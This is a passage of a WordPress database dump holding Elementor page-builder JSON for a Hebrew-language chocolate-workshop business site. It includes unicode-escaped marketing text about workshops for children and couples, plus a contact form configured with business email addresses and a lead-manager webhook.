\\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d9\\u05d4\\u05e0\\u05d5 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05db\\u05e9\\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d5\\u05d1\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d4\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/p><p><strong>\\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b495af6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><span style=\\\"text-decoration: underline;\\\"><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/span><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779&lm_key=ec25004589054b7cb52f27a1c66716ff\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1827,366,'_elementor_version','2.7.5'),(1828,366,'_elementor_template_type','wp-post'),(1829,366,'_elementor_pro_version','2.7.3'),(1839,370,'_edit_lock','1596644473:1'),(1841,370,'_edit_last','1'),(1842,370,'_yoast_wpseo_title','סדנאות שוקולד - לחוויה בלתי נשכחת | Chocolate4U'),(1843,370,'_yoast_wpseo_metadesc','סדנאות שוקולד הן הפיתרון המושלם לחגיגה או ציון כל אירוע. שקולד4U מציגה מגוון רחב של סדנאות שוקולד כמו: סדנת שוקולד זוגית, סדנאות שוקולד לילדים, מבוגרים, עובדים, סדנת שוקולד ליום הולדת ועוד.'),(1852,374,'_wp_page_template','elementor_header_footer'),(1853,374,'_elementor_edit_mode','builder'),(1854,374,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"03908aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><\\/p>\\n<p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.&nbsp;<\\/p>\\n<h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2>\\n<ul>\\n<li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li>\\n<li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li>\\n<li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li>\\n<li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li>\\n<\\/ul>\\n<p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"106e6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><span style=\\\"text-decoration: underline;\\\"><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/span><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas 